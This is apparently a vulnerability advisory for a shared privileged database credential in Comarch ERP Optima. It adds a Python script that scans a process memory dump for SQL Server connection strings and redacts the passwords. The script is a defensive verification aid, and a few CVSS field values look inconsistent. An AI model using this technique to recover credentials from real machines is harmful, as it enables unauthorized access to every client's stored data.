Privilege Escalation Vulnerability in Comarch ERP Optima
CVE-2025-68420

7.5HIGH

Key Information:

Vendor

Comarch

CVE Published:
14 May 2026

What is CVE-2025-68420?

The Comarch ERP Optima client connects to its database with a single highly privileged account, regardless of which application account the user logs in with. A local attacker who controls the client process can dump the process memory and recover that database credential, then use it to connect to the database directly with privileged rights, bypassing the application's own authorization and exposing the confidentiality and integrity of all stored data. Exploitation does not require an active user login. Because the credential is shared rather than tied to the individual application user, one compromised workstation exposes the data of every client that uses the same database. The issue is remediated in version 2026.4; updating the client is the mitigation.
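How a tester would confirm this class of finding on a memory dump of the client process, as an added example that is not Comarch's code and not part of the original advisory: it scans the dump for SQL Server style connection strings in both ASCII and UTF-16LE (the encoding a .NET client keeps strings in) and reports the login name with the password redacted, so the finding can be verified without copying the secret into a report. The dump bytes, host names, database names and credentials are constructed for the example; the key names (`User ID`, `Password`, `Pwd`, `Data Source`) are the standard SQL Server connection-string keys, and the assumption that the client talks to SQL Server is mine, not a statement from this page.

```python
import re

# Constructed sample process memory. A .NET client holds strings as UTF-16LE,
# so a connection string appears with a NUL after every character; native
# ODBC/ADO code may hold the same string as plain ASCII. Both are embedded.
# Host, database and credential values are invented for this example.
ASCII_CONN = b"Server=sqlhost\\OPTIMA;Database=CDN_Firma;User ID=sa;Password=Hunter2!;"
UTF16_CONN = ("Data Source=sqlhost;Initial Catalog=CDN_Konfiguracja;"
              "User ID=optima_admin;Password=S3cret#pass;").encode("utf-16-le")
SAMPLE_DUMP = (b"\x00" * 32 + b"GARBAGE\n" + ASCII_CONN + b"\x90" * 40
               + UTF16_CONN + b"\xff" * 16)

# Printable runs of at least MIN_LEN characters, in ASCII and in UTF-16LE.
MIN_LEN = 16
ASCII_RUN = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)

# Standard SQL Server connection-string keys (lower-cased for lookup).
USER_KEYS = ("user id", "uid", "user")
PASSWORD_KEYS = ("password", "pwd")
SERVER_KEYS = ("server", "data source", "address", "addr")


def extract_strings(data):
    """Yield (offset, encoding, text) for every printable run in the dump."""
    for m in ASCII_RUN.finditer(data):
        yield m.start(), "ascii", m.group().decode("ascii")
    for m in UTF16_RUN.finditer(data):
        yield m.start(), "utf-16-le", m.group().decode("utf-16-le")


def parse_conn_string(text):
    """Split 'Key=Value;Key=Value' into a dict with lower-cased keys."""
    kv = {}
    for part in text.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            kv[key.strip().lower()] = value.strip()
    return kv


def first_present(kv, keys):
    """Return the value of the first key found, or None."""
    return next((kv[k] for k in keys if k in kv), None)


def redact(secret):
    """Keep first character and length: verifiable in a report, not a leak."""
    return secret[:1] + "*" * max(len(secret) - 1, 0)


def find_db_credentials(data):
    """Return every connection string carrying a login and password, by offset."""
    findings = []
    for offset, encoding, text in extract_strings(data):
        kv = parse_conn_string(text)
        user = first_present(kv, USER_KEYS)
        password = first_present(kv, PASSWORD_KEYS)
        if user is None or password is None:
            continue
        findings.append({
            "offset": offset,
            "encoding": encoding,
            "server": first_present(kv, SERVER_KEYS),
            "user": user,
            "password_redacted": redact(password),
        })
    return sorted(findings, key=lambda f: f["offset"])


if __name__ == "__main__":
    for f in find_db_credentials(SAMPLE_DUMP):
        print(f"0x{f['offset']:08x} {f['encoding']:9s} server={f['server']} "
              f"user={f['user']} password={f['password_redacted']}")
```

On a real dump (for example one taken with a process-dumping tool on the workstation) the same two regexes apply to the file contents; the security-relevant check is whether the recovered login is the same privileged account on every workstation, independent of which application user was logged in, which is exactly the condition this advisory describes.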

Affected Version(s)

ERP Optima, all versions before 2026.4

CVSS V4

Score: 7.5
Severity: HIGH
Confidentiality: High
Integrity: High
Availability: Low
Attack Vector: Local
Attack Complexity: Low
Attack Requirements: Physical
Privileges Required: Undefined
User Interaction: None

Credit

Wojciech Giełda